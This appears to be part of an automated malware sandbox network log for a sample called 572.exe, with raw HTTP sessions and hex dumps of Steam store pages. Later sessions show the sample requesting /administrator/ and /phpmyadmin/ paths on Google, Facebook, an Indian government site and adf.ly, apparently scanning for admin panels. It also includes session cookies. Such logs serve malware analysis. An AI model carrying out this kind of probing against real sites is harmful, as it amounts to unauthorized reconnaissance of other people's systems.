                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://store.cloudflare.steamstatic.com/ https://store.cloudflare.steamstatic.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' http://store.steampowered.com https://store.steampowered.com http://127.0.0.1:27060 ws://127.0.0.1:27060 https://community.cloudflare.steamstatic.com/ https://steamcommunity.com/ https://steamcommunity.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://shared.cloudflare.steamstatic.com/ https://checkout.steampowered.com/; frame-src 'self' steam: http://www.youtube.com https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://steamcommunity.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'none';
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=10368000
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: steamCountry=US%7C30188d811e243eaaab468117a5a3e458; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: browserid=3305147563454937137; Expires=Tue, 04 Feb 2025 11:14:53 GMT; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: sessionid=78d17b7a9127d6e309fa93ff; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC14572INData Raw: 30 30 30 30 36 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 00006000<!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC10016INData Raw: 3d 6a 61 70 61 6e 65 73 65 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 6a 61 70 61 6e 65 73 65 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e6 97 a5 e6 9c ac e8 aa 9e 20 28 4a 61 70 61 6e 65 73 65 29 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 6b 6f 72 65 61 6e 61 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 6b 6f 72 65 61 6e 61 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e ed 95 9c ea b5 ad ec 96 b4 20 28 4b 6f 72 65 61 6e 29 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: =japanese" onclick="ChangeLanguage( 'japanese' ); return false;"> (Japanese)</a><a class="popup_menu_item tight" href="?l=koreana" onclick="ChangeLanguage( 'koreana' ); return false;"> (Korean)</a>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 67 65 73 74 69 6f 6e 73 20 3d 20 24 4a 28 22 23 64 65 65 70 5f 64 69 76 65 5f 73 65 61 72 63 68 5f 73 75 67 67 65 73 74 69 6f 6e 5f 63 6f 6e 74 65 6e 74 73 22 29 3b 0d 0a 09 09 45 6e 61 62 6c 65 53 65 61 72 63 68 53 75 67 67 65 73 74 69 6f 6e 73 28 20 74 68 69 6e 67 2c 20 27 31 5f 34 5f 34 5f 27 2c 20 27 55 53 27 2c 20 31 2c 20 27 65 6e 67 6c 69 73 68 27 2c 20 67 5f 72 67 55 73 65 72 50 72 65 66 65 72 65 6e 63 65 73 2c 20 27 32 32 32 30 36 38 35 36 27 2c 20 65 6c 65 6d 53 75 67 67 65 73 74 69 6f 6e 73 43 74 6e 2c 20 65 6c 65 6d 53 75 67 67 65 73 74 69 6f 6e 73 29 3b 0d 0a 09 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 6f 6d 65 5f 70 61 67 65 5f 63 6f 6c 5f 77 72 61 70 70 65 72 22 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 00006000gestions = $J("#deep_dive_search_suggestion_contents");EnableSearchSuggestions( thing, '1_4_4_', 'US', 1, 'english', g_rgUserPreferences, '22206856', elemSuggestionsCtn, elemSuggestions);}</script><div class="home_page_col_wrapper"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC8204INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 6f 66 74 77 61 72 65 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 73 6f 75 6e 64 74 72 61 63 6b 73 3f 73 6e 72 3d 31 5f 34 5f 34 5f 5f 31 32 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 53 6f 75 6e 64 74 72 61 63 6b 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 74 65 67 6f 72 79 5f 68 72 20 72 65 73 70 6f 6e 73 69 76 65 5f 68
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Software</a><a class="popup_menu_item" href="https://store.steampowered.com/soundtracks?snr=1_4_4__12">Soundtracks</a><div class="category_hr responsive_h
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 72 65 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6f 6c 75 6d 6e 26 71 75 6f 74 3b 7d 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 73 75 62 68 65 61 64 65 72 20 72 65 64 75 63 65 64 5f 76 73 70 61 63 65 20 72 65 73 70 6f 6e 73 69 76 65 5f 68 69 64 64 65 6e 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 62 72 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 70 6f 70 75 70 5f 67 65 6e 72 65 5f 65 78 70 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 00004000ren&quot;:&quot;column&quot;}"><div class="popup_menu_subheader reduced_vspace responsive_hidden"><br></div><div class="popup_menu_item popup_genre_expa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC12INData Raw: 3c 64 69 76 20 63 6c 61 73 73 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <div class
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 3d 22 73 70 6f 74 6c 69 67 68 74 5f 62 6f 64 79 22 3e 4f 66 66 65 72 20 65 6e 64 73 20 46 65 62 20 31 35 20 40 20 31 30 3a 30 30 61 6d 2e 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 6f 74 6c 69 67 68 74 5f 62 6f 64 79 20 73 70 6f 74 6c 69 67 68 74 5f 70 72 69 63 65 20 70 72 69 63 65 22 3e 0d 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 73 63 6f 75 6e 74 5f 62 6c 6f 63 6b 20 64 69 73 63 6f 75 6e 74 5f 62 6c 6f 63 6b 5f 73 70 6f 74 6c 69 67 68 74 20 64 69 73 63 6f 75 6e 74 5f 62 6c 6f 63 6b 5f 6c 61 72 67 65 22 20 64 61 74 61 2d 70 72 69 63 65 2d 66 69 6e 61 6c 3d 22 39 39 39 22 20 64 61 74 61 2d 62 75 6e 64 6c 65 64 69 73 63 6f 75 6e 74 3d 22 30 22 20 64 61 74 61 2d 64 69
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 00004000="spotlight_body">Offer ends Feb 15 @ 10:00am.</div><div class="spotlight_body spotlight_price price"><div class="discount_block discount_block_spotlight discount_block_large" data-price-final="999" data-bundlediscount="0" data-di
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC12INData Raw: 20 20 3c 64 69 76 20 63 6c 61 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <div cla
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC14660INData Raw: 30 30 30 30 33 39 33 38 0d 0a 73 73 3d 22 6e 6f 6e 72 65 73 70 6f 6e 73 69 76 65 5f 68 69 64 64 65 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 63 6f 6e 74 65 6e 74 5f 64 69 76 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4d 6f 72 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 70 75 62 6c 69 63 2f 69 6d 61 67 65 73 2f 6d 6f 62 69 6c 65 2f 52 65 73 70 6f 6e 73 69 76 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 00003938ss="nonresponsive_hidden"> <div class="responsive_content_dive"> More <img src="https://store.cloudflare.steamstatic.com/public/images/mobile/Responsive
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 4a 75 73 74 69 63 65 20 4c 65 61 67 75 65 22 20 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 73 63 6f 75 6e 74 5f 62 6c 6f 63 6b 20 74 61 62 5f 69 74 65 6d 5f 64 69 73 63 6f 75 6e 74 20 6e 6f 5f 64 69 73 63 6f 75 6e 74 22 20 64 61 74 61 2d 70 72 69 63 65 2d 66 69 6e 61 6c 3d 22 36 39 39 39 22 20 64 61 74 61 2d 62 75 6e 64 6c 65 64 69 73 63 6f 75 6e 74 3d 22 30 22 20 64 61 74 61 2d 64 69 73 63 6f 75 6e 74 3d 22 30 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 73 63 6f 75 6e 74 5f 70 72 69 63 65 73 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 73 63 6f 75 6e 74 5f 66 69 6e 61 6c 5f 70 72 69 63 65 22 3e 24 36 39 2e 39 39 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 09
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 00006000Justice League" ></div><div class="discount_block tab_item_discount no_discount" data-price-final="6999" data-bundlediscount="0" data-discount="0"><div class="discount_prices"><div class="discount_final_price">$69.99</div></div></div>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                103192.168.2.656115142.250.105.84443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC183OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC842INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1252INData Raw: 36 36 41 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 65 67 35 34 33 6b 5f 67 61 7a 49 75 34 69 4b 62 47 6b 65 4b 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7eg543k_gazIu4iKbGkeKw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC397INData Raw: 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                104192.168.2.655273164.100.213.210443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC171OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ssc.nic.in
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC932INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store,no-cache
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                                                                                                                                                                Location: https://ssc.nic.in/Error/NotFound?aspxerrorpath=/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Server:
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src * data:; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdn.jsdelivr.net https://ajax.googleapis.com www.google-analytics.com www.googletagmanager.com; frame-src 'self' 'unsafe-inline' 'unsafe-eval'; object-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' 'unsafe-inline' 'unsafe-eval' www.google-analytics.com; font-src 'self' 'unsafe-inline' 'unsafe-eval';
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 176
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC176INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 73 63 2e 6e 69 63 2e 69 6e 2f 45 72 72 6f 72 2f 4e 6f 74 46 6f 75 6e 64 3f 61 73 70 78 65 72 72 6f 72 70 61 74 68 3d 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ssc.nic.in/Error/NotFound?aspxerrorpath=/phpmyadmin/">here</a>.</h2></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                105192.168.2.65583831.13.65.1443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC182OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pl-pl.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC392INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.facebook.com/administrator/?locale=pl_PL&_rdr
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                                                                                                                                                                                                X-FB-Debug: hASojorMjBxwQK6gTx4nWEjg4b/BmSIYSktrdUGVx1UarjTCJP+RuQYoNBAbjPLK/19c7TQfgpU/u2gVJkFqvA==
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                106192.168.2.656142172.66.43.117443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC208OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login.adf.ly
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: FLYSESSID=r2c0p26i5n0hv6h164082hcuoe
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC854INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                x-powered-by: adfly
                                                                                                                                                                                                                                                                                                                                                                location: https://adf.ly/?240
                                                                                                                                                                                                                                                                                                                                                                x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pgGE4iKqbvkHqn7Fk0N935x2LwckH7ySmykVnlSLHYb59GWBnCSeeKOA5xldAQUDR3S%2B1Jb8kZgpdKY9qtqzW3NG2DdiBo6%2ButHzz6I8kmk3qedXVQslhWwg31FdfnM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb7d0ceb458d-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                107192.168.2.65588931.13.88.35443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC193OUTGET /phpmyadmin/?locale=hi_IN&_rdr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: m.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC786INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: datr=LcPAZQM9gzjNjJ56zu--bAs0; expires=Tue, 11-Mar-2025 11:14:53 GMT; Max-Age=34560000; path=/; domain=.facebook.com; secure; httponly
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fphpmyadmin%2F%3Flocale%3Dhi_IN&refsrc=deprecated&locale2=hi_IN&_rdr
                                                                                                                                                                                                                                                                                                                                                                reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0"
